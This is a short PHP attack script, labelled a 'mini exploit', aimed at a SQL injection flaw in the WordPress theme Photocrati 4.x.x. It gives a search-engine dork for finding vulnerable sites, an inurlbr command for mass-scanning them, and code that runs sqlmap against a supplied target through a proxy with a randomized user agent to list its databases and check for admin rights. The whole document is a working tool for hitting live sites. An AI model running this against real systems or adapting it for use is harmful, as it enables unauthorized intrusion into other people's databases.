[MINI EXPLOIT] Wordpress Theme Photocrati 4.x.x - SQLI & XSS

1. <?php
2. set_time_limit(0);
3. # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
4. # Blog:          http://blog.inurl.com.br
5. # Twitter:       https://twitter.com/googleinurl
6. # Fanpage:       https://fb.com/InurlBrasil
7. # Pastebin       http://pastebin.com/u/Googleinurl
8. # GIT:           https://github.com/googleinurl
9. # PSS:           http://packetstormsecurity.com/user/googleinurl/
10. # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
11. # REF:           http://www.exploit-db.com/exploits/36242/
12. # DORK:          inurl:"/ecomm-sizes.php?prod_id="
13. # INURLBR:       ./inurlbr.php --dork 'inurl:"/ecomm-sizes.php?prod_id="' -s save.txt -q 1,6,7,14 --comand-all 'php miniexploit3.php  _TARGETFULL_'
14. echo "[+]  MINI exploit-SQLMAP / Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS\n";
15. $target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}")  : exit("\n0x[ERRO] DEFINE TARGET!\n");
16. $command = "python ../sqlmap/sqlmap.py -u '{$target}' -p prod_id --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba";
17. system($command, $dados).empty($dados[0]) ? exit() : NULL;